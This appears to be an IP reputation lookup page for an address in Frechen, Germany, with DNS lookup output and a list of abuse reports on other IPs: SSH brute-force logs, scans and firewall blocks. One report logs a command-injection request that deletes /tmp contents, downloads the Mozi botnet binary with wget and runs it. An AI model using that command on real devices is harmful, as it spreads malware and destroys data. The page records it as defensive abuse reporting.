Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Frechen

Region: Nordrhein-Westfalen

Country: Germany

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 92.200.148.145
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 12086
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;92.200.148.145.			IN	A

;; AUTHORITY SECTION:
.			168	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022102901 1800 900 604800 86400

;; Query time: 15 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Oct 30 12:47:41 CST 2022
;; MSG SIZE  rcvd: 107
Host info
145.148.200.92.in-addr.arpa domain name pointer port-92-200-148-145.dynamic.as20676.net.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
145.148.200.92.in-addr.arpa	name = port-92-200-148-145.dynamic.as20676.net.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
157.230.251.115 attack
SSH brutforce
2020-10-07 21:40:26
59.50.24.21 attackspam
"Unrouteable address"
2020-10-07 21:13:57
103.90.226.99 attackspambots
RDP Brute-Force (honeypot 6)
2020-10-07 21:32:17
167.86.117.63 attackbotsspam
Oct  7 11:21:22 cdc sshd[7937]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.86.117.63  user=root
Oct  7 11:21:24 cdc sshd[7937]: Failed password for invalid user root from 167.86.117.63 port 57666 ssh2
2020-10-07 21:19:05
212.40.65.211 attackbots
Oct  7 10:10:11 nopemail auth.info sshd[2693]: Disconnected from authenticating user root 212.40.65.211 port 43782 [preauth]
...
2020-10-07 21:36:11
218.92.0.173 attackbotsspam
frenzy
2020-10-07 21:39:19
45.129.33.6 attackbots
ET DROP Dshield Block Listed Source group 1 - port: 5083 proto: tcp cat: Misc Attackbytes: 60
2020-10-07 21:24:12
157.230.38.102 attackbots
firewall-block, port(s): 1020/tcp
2020-10-07 21:17:37
112.85.42.85 attackspambots
fail2ban -- 112.85.42.85
...
2020-10-07 21:40:02
134.209.189.230 attackspambots
2020-10-07 21:10:06
115.55.142.226 attack
SS5,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.55.142.226:57732/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-10-07 21:27:26
125.106.248.164 attackbots
Connection to SSH Honeypot - Detected by HoneypotDB
2020-10-07 21:12:17
167.86.126.200 attackspam
Oct  7 09:24:28 mx sshd[29324]: Failed password for root from 167.86.126.200 port 42884 ssh2
2020-10-07 21:30:09
218.92.0.212 attack
[MK-VM3] SSH login failed
2020-10-07 21:29:41
185.176.27.42 attackbotsspam
scans 15 times in preceeding hours on the ports (in chronological order) 6411 27036 6141 4488 51213 37954 4147 7000 6320 51447 9273 51371 9759 9878 6407 resulting in total of 59 scans from 185.176.27.0/24 block.
2020-10-07 21:03:27

Recently Reported IPs

185.230.45.39 2603:3017:228:4000:683c:c6d1:5fee:eeca 196.192.14.246 65.70.81.50
150.62.150.12 232.222.252.160 155.70.112.199 203.223.220.237
133.239.155.111 162.210.7.94 35.92.165.106 224.179.73.110
204.85.158.11 34.252.194.225 2.164.248.129 154.58.24.115
49.134.255.120 187.230.27.148 237.134.153.65 230.98.94.197